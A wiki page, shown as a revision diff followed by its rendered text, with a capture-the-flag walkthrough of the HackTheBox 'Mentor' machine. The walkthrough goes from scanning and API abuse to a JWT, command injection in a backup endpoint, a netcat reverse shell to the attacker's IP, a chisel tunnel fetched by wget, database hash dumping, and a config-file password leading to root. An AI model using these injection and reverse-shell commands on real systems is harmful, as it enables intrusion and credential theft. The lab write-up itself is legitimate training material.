(Created page with "Category:HackTheBox Start with nmap scan with default scripts a version enumeration <source lang="bash">Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 07:45 MST Nmap scan report for 10.129.85.230 Host is up (0.085s latency)....") |
No edit summary |
||
| Line 2: | Line 2: | ||
Start with nmap scan with default scripts a version enumeration | Start with nmap scan with default scripts a version enumeration | ||
< | <syntaxhighlight lang="bash">Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 07:45 MST | ||
Nmap scan report for 10.129.85.230 | Nmap scan report for 10.129.85.230 | ||
Host is up (0.085s latency). | Host is up (0.085s latency). | ||
| Line 17: | Line 17: | ||
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | ||
Nmap done: 1 IP address (1 host up) scanned in 27.41 seconds </ | Nmap done: 1 IP address (1 host up) scanned in 27.41 seconds </syntaxhighlight> | ||
Main webpage does not have much to look at. Lets scan subdomains. Vhost/subdomain scan gets us <code>api.mentorquotes.htb</code> Scan see if we get anything else <code>api.mentorquotes.htb</code> | Main webpage does not have much to look at. Lets scan subdomains. Vhost/subdomain scan gets us <code>api.mentorquotes.htb</code> Scan see if we get anything else <code>api.mentorquotes.htb</code> | ||
< | <syntaxhighlight lang="bash"> :: Method : GET │ | ||
:: URL : http://api.mentorquotes.htb/FUZZ │ | :: URL : http://api.mentorquotes.htb/FUZZ │ | ||
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt │ | :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt │ | ||
| Line 35: | Line 35: | ||
quotes [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 84ms] │ | quotes [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 84ms] │ | ||
server-status [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 60ms] │ | server-status [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 60ms] │ | ||
:: Progress: [30000/30000] :: Job [1/1] :: 387 req/sec :: Duration: [0:01:18] :: Errors: 2 :: </ | :: Progress: [30000/30000] :: Job [1/1] :: 387 req/sec :: Duration: [0:01:18] :: Errors: 2 :: </syntaxhighlight> | ||
We get a <code>Status 200</code> from docs lets check that out. We see a potenial user <code>James</code> We also see various GET, POST, PUT, DELETE options. Try to create user. WORKS! | We get a <code>Status 200</code> from docs lets check that out. We see a potenial user <code>James</code> We also see various GET, POST, PUT, DELETE options. Try to create user. WORKS! | ||
< | <syntaxhighlight lang="bash">{ | ||
"email": "sour@sourmilk.com", | "email": "sour@sourmilk.com", | ||
"username": "sourmilk", | "username": "sourmilk", | ||
| Line 50: | Line 50: | ||
"username": "sourmilk" | "username": "sourmilk" | ||
} | } | ||
</ | </syntaxhighlight> | ||
Create james account since we know he is an admin. | Create james account since we know he is an admin. | ||
< | <syntaxhighlight lang="bash">{ | ||
"email": "james@sourmilk.com", | "email": "james@sourmilk.com", | ||
"username": "james", | "username": "james", | ||
| Line 65: | Line 65: | ||
"email": "james@sourmilk.com", | "email": "james@sourmilk.com", | ||
"username": "james" | "username": "james" | ||
}</ | }</syntaxhighlight> | ||
<code>/auth/login</code> to get a token | <code>/auth/login</code> to get a token | ||
< | <syntaxhighlight lang="bash">{ | ||
"email": "james@sourmilk.com", | "email": "james@sourmilk.com", | ||
"username": "james", | "username": "james", | ||
| Line 74: | Line 74: | ||
} | } | ||
# response | # response | ||
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY"</ | "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY"</syntaxhighlight> | ||
curl <code>/admin</code> with token to get a response. | curl <code>/admin</code> with token to get a response. | ||
< | <syntaxhighlight lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/ | ||
# Response | # Response | ||
{"admin_funcs":{"check db connection":"/check","backup the application":"/backup"}}</ | {"admin_funcs":{"check db connection":"/check","backup the application":"/backup"}}</syntaxhighlight> | ||
check <code>/admin/check</code> | check <code>/admin/check</code> | ||
< | <syntaxhighlight lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/check | ||
# Reponse | # Reponse | ||
{"details":"Not implemented yet!"} | {"details":"Not implemented yet!"} | ||
</ | </syntaxhighlight> | ||
Check <code>/admin/backup/</code> | Check <code>/admin/backup/</code> | ||
< | <syntaxhighlight lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup | ||
# Response | # Response | ||
{"detail":"Method Not Allowed"} | {"detail":"Method Not Allowed"} | ||
{"detail":[{"loc":["body"],"msg":"field required","type":"value_error.missing"}]}</ | {"detail":[{"loc":["body"],"msg":"field required","type":"value_error.missing"}]}</syntaxhighlight> | ||
Make a test payload to see if we can do anything. Works! | Make a test payload to see if we can do anything. Works! | ||
< | <syntaxhighlight lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `wget http://10.10.16.11`"}'</syntaxhighlight> | ||
Reverse Shell | Reverse Shell | ||
< | <syntaxhighlight lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.11 4444 >/tmp/f`"}'</syntaxhighlight> | ||
Dig around the docker you are in. | Dig around the docker you are in. | ||
< | <syntaxhighlight lang="bash">/app # ls | ||
Dockerfile | Dockerfile | ||
app | app | ||
| Line 126: | Line 126: | ||
-rw-r--r-- 1 root root 1001 Jun 7 2022 db.py | -rw-r--r-- 1 root root 1001 Jun 7 2022 db.py | ||
-rw-r--r-- 1 root root 1149 Jun 4 2022 main.py | -rw-r--r-- 1 root root 1149 Jun 4 2022 main.py | ||
-rw-r--r-- 1 root root 704 Jun 4 2022 requirements.txt</ | -rw-r--r-- 1 root root 704 Jun 4 2022 requirements.txt</syntaxhighlight> | ||
cat db.py | cat db.py | ||
< | <syntaxhighlight lang="python">import os | ||
from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData) | from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData) | ||
| Line 164: | Line 164: | ||
# Databases query builder | # Databases query builder | ||
database = Database(DATABASE_URL)</ | database = Database(DATABASE_URL)</syntaxhighlight> | ||
[https://book.hacktricks.xyz/generic-methodologies-and- | [https://book.hacktricks.xyz/generic-methodologies-and-resyntaxhighlights/tunneling-and-port-forwarding Hacktricks Port Fowarding] [https://dev.to/jmau111/getting-started-with-chisel-in-ctfs-o76 Good read about chisel] | ||
< | <syntaxhighlight lang="bash"># My machine | ||
./chisel server -p 4443 --reverse | ./chisel server -p 4443 --reverse | ||
| Line 173: | Line 173: | ||
wget http://10.10.16.11/chisel | wget http://10.10.16.11/chisel | ||
chmod +x chisel | chmod +x chisel | ||
./chisel client -v 10.10.16.11:4443 R:5432:172.22.0.1:5432</ | ./chisel client -v 10.10.16.11:4443 R:5432:172.22.0.1:5432</syntaxhighlight> | ||
Now we can try to log into the bd we found | Now we can try to log into the bd we found | ||
< | <syntaxhighlight lang="bash">psql -h 127.0.0.1 -U "postgres" -p 5432 | ||
Password for user postgres: | Password for user postgres: | ||
psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1)) | psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1)) | ||
| Line 213: | Line 213: | ||
2 | svc@mentorquotes.htb | service_acc | -------------------------- | 2 | svc@mentorquotes.htb | service_acc | -------------------------- | ||
4 | james@sourmilk.com | james | ------------------- | 4 | james@sourmilk.com | james | ------------------- | ||
(3 rows)</ | (3 rows)</syntaxhighlight> | ||
Grab svc hash and crackstaion has a hit! | Grab svc hash and crackstaion has a hit! | ||
< | <syntaxhighlight lang="bash">123meuno***********</syntaxhighlight> | ||
SSH into box | SSH into box | ||
< | <syntaxhighlight lang="bash">❯ ssh svc@mentorquotes.htb | ||
svc@mentorquotes.htb's password: | svc@mentorquotes.htb's password: | ||
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-56-generic x86_64) | Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-56-generic x86_64) | ||
| Line 254: | Line 254: | ||
Last login: Mon Dec 12 17:10:51 2022 from 10.10.16.11 | Last login: Mon Dec 12 17:10:51 2022 from 10.10.16.11 | ||
svc@mentor:~$</ | svc@mentor:~$</syntaxhighlight> | ||
Search for passwords in config files. <code>grep -iR password /etc 2>/dev/null | grep ".conf"</code> | Search for passwords in config files. <code>grep -iR password /etc 2>/dev/null | grep ".conf"</code> | ||
< | <syntaxhighlight lang="bash">svc@mentor:/tmp$ grep -iR password /etc 2>/dev/null | grep ".conf" | ||
/etc/hdparm.conf:# --security-set-pass Set security password | /etc/hdparm.conf:# --security-set-pass Set security password | ||
/etc/hdparm.conf:# security_pass = password | /etc/hdparm.conf:# security_pass = password | ||
| Line 306: | Line 306: | ||
/etc/sudo.conf:# password prompt for "sudo -A" support. Sudo does not ship with its | /etc/sudo.conf:# password prompt for "sudo -A" support. Sudo does not ship with its | ||
/etc/apparmor.d/abstractions/authentication: # databases containing passwords, PAM configuration files, PAM libraries | /etc/apparmor.d/abstractions/authentication: # databases containing passwords, PAM configuration files, PAM libraries | ||
</ | </syntaxhighlight> | ||
Winner Winner | Winner Winner | ||
< | <syntaxhighlight lang="bash">/etc/snmp/snmpd.conf:createUser bootstrap MD5 SuperSecurePassword123__ DES</syntaxhighlight> | ||
Super user james and get your flag! | Super user james and get your flag! | ||
< | <syntaxhighlight lang="bash">james@mentor:/tmp$ su james | ||
Password: | Password: | ||
james@mentor:/tmp$ sudo /bin/sh | james@mentor:/tmp$ sudo /bin/sh | ||
| Line 321: | Line 321: | ||
# ls | # ls | ||
logins.log root.txt scripts snap | logins.log root.txt scripts snap | ||
# cat root.txt</ | # cat root.txt</syntaxhighlight> | ||
Revision as of 18:29, 20 January 2023
Start with nmap scan with default scripts a version enumeration
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 07:45 MST
Nmap scan report for 10.129.85.230
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c73bfc3cf9ceee8b4818d5d1af8ec2bb (ECDSA)
|_ 256 4440084c0ecbd4f18e7eeda85c68a4f7 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://mentorquotes.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.41 seconds
Main webpage does not have much to look at. Lets scan subdomains. Vhost/subdomain scan gets us api.mentorquotes.htb Scan see if we get anything else api.mentorquotes.htb
:: Method : GET │
:: URL : http://api.mentorquotes.htb/FUZZ │
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt │
:: Follow redirects : false │
:: Calibration : false │
:: Timeout : 10 │
:: Threads : 40 │
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500 │
________________________________________________ │
│
admin [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 98ms] │
docs [Status: 200, Size: 969, Words: 194, Lines: 31, Duration: 71ms] │
users [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 79ms] │
quotes [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 84ms] │
server-status [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 60ms] │
:: Progress: [30000/30000] :: Job [1/1] :: 387 req/sec :: Duration: [0:01:18] :: Errors: 2 ::
We get a Status 200 from docs lets check that out. We see a potenial user James We also see various GET, POST, PUT, DELETE options. Try to create user. WORKS!
{
"email": "sour@sourmilk.com",
"username": "sourmilk",
"password": "password123456"
}
# Response
{
"id": 5,
"email": "sour@sourmilk.com",
"username": "sourmilk"
}
Create james account since we know he is an admin.
{
"email": "james@sourmilk.com",
"username": "james",
"password": "password123456"
}
# Response
{
"id": 6,
"email": "james@sourmilk.com",
"username": "james"
}
/auth/login to get a token
{
"email": "james@sourmilk.com",
"username": "james",
"password": "password123456"
}
# response
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY"
curl /admin with token to get a response.
curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/
# Response
{"admin_funcs":{"check db connection":"/check","backup the application":"/backup"}}
check /admin/check
curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/check
# Reponse
{"details":"Not implemented yet!"}
Check /admin/backup/
curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup
# Response
{"detail":"Method Not Allowed"}
{"detail":[{"loc":["body"],"msg":"field required","type":"value_error.missing"}]}
Make a test payload to see if we can do anything. Works!
curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `wget http://10.10.16.11`"}'
Reverse Shell
curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.11 4444 >/tmp/f`"}'
Dig around the docker you are in.
/app # ls
Dockerfile
app
requirements.txt
/app # ls -al
total 32
drwxr-xr-x 1 root root 4096 Nov 10 16:00 .
drwxr-xr-x 1 root root 4096 Nov 10 16:00 ..
-rw-r--r-- 1 root root 1024 Jun 12 10:21 .Dockerfile.swp
-rw-r--r-- 1 root root 522 Nov 3 12:58 Dockerfile
drwxr-xr-x 1 root root 4096 Nov 10 16:00 app
-rw-r--r-- 1 root root 672 Jun 4 2022 requirements.txt
/app # cd app
/app/app # ls -al
total 40
drwxr-xr-x 1 root root 4096 Nov 10 16:00 .
drwxr-xr-x 1 root root 4096 Nov 10 16:00 ..
-rw-r--r-- 1 root root 0 Jun 4 2022 __init__.py
drwxr-xr-x 1 root root 4096 Nov 10 16:00 __pycache__
drwxr-xr-x 1 root root 4096 Nov 10 16:00 api
-rw-r--r-- 1 root root 0 Jun 4 2022 config.py
-rw-r--r-- 1 root root 1001 Jun 7 2022 db.py
-rw-r--r-- 1 root root 1149 Jun 4 2022 main.py
-rw-r--r-- 1 root root 704 Jun 4 2022 requirements.txt
cat db.py
import os
from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData)
from sqlalchemy.sql import func
from databases import Database
# Database url if none is passed the default one is used
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")
# SQLAlchemy for quotes
engine = create_engine(DATABASE_URL)
metadata = MetaData()
quotes = Table(
"quotes",
metadata,
Column("id", Integer, primary_key=True),
Column("title", String(50)),
Column("description", String(50)),
Column("created_date", DateTime, default=func.now(), nullable=False)
)
# SQLAlchemy for users
engine = create_engine(DATABASE_URL)
metadata = MetaData()
users = Table(
"users",
metadata,
Column("id", Integer, primary_key=True),
Column("email", String(50)),
Column("username", String(50)),
Column("password", String(128) ,nullable=False)
)
# Databases query builder
database = Database(DATABASE_URL)
Hacktricks Port Fowarding Good read about chisel
# My machine
./chisel server -p 4443 --reverse
# Victim machine
wget http://10.10.16.11/chisel
chmod +x chisel
./chisel client -v 10.10.16.11:4443 R:5432:172.22.0.1:5432
Now we can try to log into the bd we found
psql -h 127.0.0.1 -U "postgres" -p 5432
Password for user postgres:
psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1))
Type "help" for help.
postgres=# \list
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-----------------+----------+----------+------------+------------+-----------------------
mentorquotes_db | postgres | UTF8 | en_US.utf8 | en_US.utf8 |
postgres | postgres | UTF8 | en_US.utf8 | en_US.utf8 |
template0 | postgres | UTF8 | en_US.utf8 | en_US.utf8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.utf8 | en_US.utf8 | =c/postgres +
| | | | | postgres=CTc/postgres
(4 rows)
postgres=# \c mentorquotes_db
psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1))
You are now connected to database "mentorquotes_db" as user "postgres".
mentorquotes_db=# \d
List of relations
Schema | Name | Type | Owner
--------+---------------+----------+----------
public | cmd_exec | table | postgres
public | quotes | table | postgres
public | quotes_id_seq | sequence | postgres
public | users | table | postgres
public | users_id_seq | sequence | postgres
(5 rows)
mentorquotes_db=# select * from users;
id | email | username | password
----+-------------------------+-------------+----------------------------------
1 | james@mentorquotes.htb | james | -----------------------------
2 | svc@mentorquotes.htb | service_acc | --------------------------
4 | james@sourmilk.com | james | -------------------
(3 rows)
Grab svc hash and crackstaion has a hit!
123meuno***********
SSH into box
❯ ssh svc@mentorquotes.htb
svc@mentorquotes.htb's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-56-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Dec 12 05:21:51 PM UTC 2022
System load: 0.08740234375
Usage of /: 64.9% of 8.09GB
Memory usage: 14%
Swap usage: 0%
Processes: 237
Users logged in: 0
IPv4 address for br-028c7a43f929: 172.20.0.1
IPv4 address for br-24ddaa1f3b47: 172.19.0.1
IPv4 address for br-3d63c18e314d: 172.21.0.1
IPv4 address for br-7d5c72654da7: 172.22.0.1
IPv4 address for br-a8a89c3bf6ff: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.129.85.242
IPv6 address for eth0: dead:beef::250:56ff:feb9:4e9f
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Dec 12 17:10:51 2022 from 10.10.16.11
svc@mentor:~$
Search for passwords in config files. grep -iR password /etc 2>/dev/null | grep ".conf"
svc@mentor:/tmp$ grep -iR password /etc 2>/dev/null | grep ".conf"
/etc/hdparm.conf:# --security-set-pass Set security password
/etc/hdparm.conf:# security_pass = password
/etc/hdparm.conf:# --user-master Select password to use
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for initiator
/etc/iscsi/iscsid.conf:#node.session.auth.password = password
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#node.session.auth.password_in = password_in
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for the initiator
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password = password
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password_in = password_in
/etc/ssh/ssh_config:# PasswordAuthentication yes
/etc/ssh/sshd_config:#PermitRootLogin prohibit-password
/etc/ssh/sshd_config:# To disable tunneled clear text passwords, change to no here!
/etc/ssh/sshd_config:#PasswordAuthentication yes
/etc/ssh/sshd_config:#PermitEmptyPasswords no
/etc/ssh/sshd_config:# Change to yes to enable challenge-response passwords (beware issues with
/etc/ssh/sshd_config:# PasswordAuthentication. Depending on your PAM configuration,
/etc/ssh/sshd_config:# the setting of "PermitRootLogin without-password".
/etc/ssh/sshd_config:# PAM authentication, then enable this but set PasswordAuthentication
/etc/ssh/sshd_config:PasswordAuthentication yes
/etc/apache2/sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
/etc/sos/sos.conf:#password = true
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
/etc/snmp/snmpd.conf:createUser bootstrap MD5 SuperSecurePassword123__ DES
/etc/overlayroot.conf:# if not provided or empty, password is randomly generated
/etc/overlayroot.conf:# the generated password will be stored for recovery in
/etc/overlayroot.conf:# crypt:dev=/dev/vdb,pass=somepassword,mkfs=0
/etc/overlayroot.conf:# $ MAPNAME="secure"; DEV="/dev/vdg"; PASSWORD="foobar"
/etc/overlayroot.conf:# $ printf "%s" "$PASSWORD" |
/etc/overlayroot.conf:# $ printf "%s" "$PASSWORD" |
/etc/overlayroot.conf:# IT IS INSECURE TO SET THIS PASSWORD HERE IN THIS CLEARTEXT CONFIGURATION
/etc/overlayroot.conf:# Randomly generated passwords are more secure, but you won't be able to
/etc/overlayroot.conf:# Randomly generated passwords are generated by calculating the sha512sum
/etc/fwupd/remotes.d/lvfs-testing.conf:#Password=
/etc/fwupd/redfish.conf:# The username and password to the Redfish service
/etc/fwupd/redfish.conf:#Password=
/etc/sudo.conf:# password prompt for "sudo -A" support. Sudo does not ship with its
/etc/apparmor.d/abstractions/authentication: # databases containing passwords, PAM configuration files, PAM libraries
Winner Winner
/etc/snmp/snmpd.conf:createUser bootstrap MD5 SuperSecurePassword123__ DES
Super user james and get your flag!
james@mentor:/tmp$ su james
Password:
james@mentor:/tmp$ sudo /bin/sh
[sudo] password for james:
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
logins.log root.txt scripts snap
# cat root.txt